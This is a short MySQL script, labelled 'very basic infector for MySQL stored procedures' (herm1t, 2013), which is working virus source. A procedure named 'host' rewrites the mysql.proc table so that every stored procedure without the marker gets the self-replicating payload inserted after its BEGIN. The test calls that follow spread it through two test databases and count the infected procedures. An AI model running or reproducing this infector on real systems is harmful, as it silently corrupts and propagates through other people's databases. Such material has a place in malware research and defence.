# very basic infector for MySQL stored procedures
# (c) herm1t, january, 2013

DELIMITER //
# test database 1
DROP DATABASE IF EXISTS test;
CREATE DATABASE test;
USE test;

CREATE PROCEDURE baz()
BEGIN
	SELECT "baz";
END//

# test database 2
DROP DATABASE IF EXISTS test2;
CREATE DATABASE test2;
USE test2;

CREATE PROCEDURE foo()
BEGIN
	SELECT "foo";
END//

CREATE PROCEDURE host()
BEGIN
	SET @virus="
	UPDATE	mysql.proc
	SET	body=REPLACE(body, 'BEGIN',CONCAT(
		'BEGIN',CHAR(10),'SET @virus=',CHAR(34),?,CHAR(34),
		';PREPARE stm FROM @virus;EXECUTE stm USING @virus;'))
	WHERE	body NOT LIKE '%@virus%'";
	PREPARE stm FROM @virus;EXECUTE stm USING @virus;
END//
# tests
CALL host();
CALL test.baz();

CREATE PROCEDURE bar()
BEGIN
	SELECT "bar";
END//

CALL foo();
CALL bar();

SELECT COUNT(*) AS Total FROM mysql.proc;
SELECT COUNT(*) AS Infected FROM mysql.proc WHERE body LIKE '%@virus%';
SELECT body FROM mysql.proc WHERE name = 'bar';